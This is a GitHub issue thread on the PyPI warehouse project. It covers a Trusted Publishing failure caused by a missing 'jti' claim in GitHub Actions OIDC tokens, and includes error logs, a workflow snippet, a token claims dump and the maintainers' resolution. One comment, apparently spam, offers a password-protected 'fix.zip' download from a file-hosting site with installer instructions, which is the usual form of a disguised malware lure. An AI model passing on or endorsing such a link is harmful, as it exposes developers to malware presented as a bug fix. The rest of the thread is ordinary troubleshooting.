### ISSUE TITLE
valid token, but no corresponding publisher (Missing claim 'jti') when publishing to test.pypi.org from GHA

### ISSUE THREAD

**Issue by offbyone** [pypi/warehouse#16569]
**Describe the bug**

I'm seeing what _looks_ like a failure of GitHub actions' tokens to include a JTI: https://github.com/offbyone/django-svcs/actions/runs/10552758336/job/29233437205

```
##[debug]Authenticating to https://test.pypi.org/legacy/ via Trusted Publishing
##[debug]Selected Trusted Publishing Exchange Endpoint: https://test.pypi.org/_/Oidc/Mint-Token
Error: Trusted publishing exchange failure: 
Token request failed: the server refused the request for the following reasons:

* `invalid-publisher`: valid token, but no corresponding publisher (Missing claim 'jti')

This generally indicates a trusted publisher configuration error, but could
also indicate an internal error on GitHub or PyPI's part.
```

This is in reference to test pypi, not primary, so it's possible this is something less critical, but it's biting me as I try to publish a new package for the first time using a trusted publisher.

**Expected behavior**

As far as I am able to tell, I am "doing trusted publishers right", so I'd expect it to work, or at least to fail with an error due to my package, not publication.

**To Reproduce**

I can restart this workflow any time: https://github.com/offbyone/django-svcs/actions/runs/10552758336

**My Platform**
GitHub actions, using this config:

```yaml
      - name: Upload package to Test PyPI
        uses: pypa/gh-action-pypi-publish@release/v1
        with:
          repository-url: https://test.pypi.org/legacy/
```

**Additional context**

First reported via a comment on #16194 
/cc @facutuesca

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by offbyone** [comment]
Here's the run with debug info added: https://github.com/offbyone/django-svcs/actions/runs/10561442400

**Comment by facutuesca** [comment]
Interesting, seems like it's a problem with GitHub, since no `jti` claim is generated:

```
{
    "actor": "offbyone",
    "actor_id": "181693",
    "aud": "debug_audience",
    "base_ref": "",
    "environment": "release-test-pypi",
    "environment_node_id": "EN_kwDOMoMCZM7iFIF1",
    "event_name": "push",
    "exp": 1724703304,
    "head_ref": "",
    "iat": 1724681704,
    "iss": "https://token.actions.githubusercontent.com",
    "job_workflow_ref": "offbyone/django-svcs/.github/workflows/pypi-package.yml@refs/heads/main",
    "job_workflow_sha": "a3dd87b046c9822379dfac7b7c867855d5b5bdf6",
    "nbf": 1724681404,
    "ref": "refs/heads/main",
    "ref_protected": "false",
    "ref_type": "branch",
    "repository": "offbyone/django-svcs",
    "repository_id": "847446628",
    "repository_owner": "offbyone",
    "repository_owner_id": "181693",
    "repository_visibility": "public",
    "run_attempt": "1",
    "run_id": "10561442400",
    "run_number": "2",
    "runner_environment": "github-hosted",
    "sha": "a3dd87b046c9822379dfac7b7c867855d5b5bdf6",
    "sub": "repo:offbyone/django-svcs:environment:release-test-pypi",
    "workflow": "Build & maybe upload PyPI package",
    "workflow_ref": "offbyone/django-svcs/.github/workflows/pypi-package.yml@refs/heads/main",
    "workflow_sha": "a3dd87b046c9822379dfac7b7c867855d5b5bdf6"
}
```

**Comment by offbyone** [comment]
I've asked internal Actions folks about this -- the fun upside of being GitHub staff :) -- and I believe this is something GitHub is going to fix. If you want, I can close this, or I can close it when that work is doen.

**Comment by woodruffw** [comment]
Thanks @offbyone! IMO it's fine to leave it open until it subsists on your side. Thanks a ton for raising it internally!

**Comment by woodruffw** [comment]
Thanks @ericsciple! Closing.
